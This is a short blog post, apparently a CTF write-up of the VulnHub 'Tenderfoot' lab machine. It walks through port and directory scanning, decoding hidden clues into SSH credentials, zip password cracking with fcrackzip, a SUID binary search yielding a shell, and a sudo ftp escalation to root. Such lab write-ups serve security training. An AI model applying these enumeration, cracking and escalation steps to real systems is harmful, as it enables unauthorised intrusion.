Open in app

Sign in

Write

Sign in

Tenderfoot vulnhub writeup

Oline77
3 min readNov 23, 2020

--

Tenderfoot box

Before, using the command sudo netdiscover, scan our local network to find tenderfoot IP.

I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

nmap -p- -A <IP>
port 80 and port 80 are open

Start with a little dirb scan on the http website:

And we found an interesting /entry.js who gives us this user in source-code : monica. Don’t forget it

Let’s start a new web enumeration. Download this wordlist and use it with gobuster.

gobuster dir --url http://<IP>/ --wordlist=/home/kali/Documents/big-dirbuster.txt -x js,php,txt,html,/ -t 100

In /fotocd source-code, we found this :

It’s a brainfuck code. Decode ti with this online tool. It gives us the following message :

=================
JDk5OTkwJA== 
=================Did you found username ?
if yes:
 Then you have cred. of one user, enter into user account 
 by ssh port. syntax:{ssh username@IP}
if not:
 Then enumerate more :)
 G00D LUCK !

We have one username, let’s decode the base64 code.

echo "JDk5OTkwJA==" | base64 -d
>$99990$

Now we have username and password for ssh login : monica:$99990$

Works !

Open user1 flag :

To list all file in /monica, use the following command. -R allows to list subdirectories recursively.

ls -Ra

We found a note.txt

Open it :

note.txt gives us the password to unzip joey.zip. Download joey.zip and unzip it with the command unzip joey.zip and the password #9175.

Now wee need to crack gift.zip, we are going to use frackzip with the rockyou.txt list.

fcrackzip -u -D -p '/home/kali/Documents/rockyou.txt' gift.zip
Works !

The extracted message tells us to find SUID or binaries. Using this command :

find / -type f -perm /6000 -ls 2>/dev/null
Interesting /opt/exec/chandler

We run it and a bash shell spawn.

/opt/exec/chandler
We are chandler user

Now cd /home/chandler/.cache/ . 3 files, open note.txt :

Decode the base32 password :

echo “OBQXG43XMQ5FSMDVINZDIY3LJUZQ====” | base32 -d
>passwd:Y0uCr4ckM3

And it’s time to be root. Exit our shell as chandler by authenticating as chandler with su chandler and password Y0uCr4ckM3. With sudo -l we see that we can execute ftp as root. On this site, we found a exploit with ftp, let’s use it :

Root !
cd /root
cat *

…well done

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Hacking
Hackthebox
Vulnhub
Ctf Writeup
Hacker

--

--

Oline77
Oline77

Written by Oline77

0 Followers
0 Following

CTF player

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams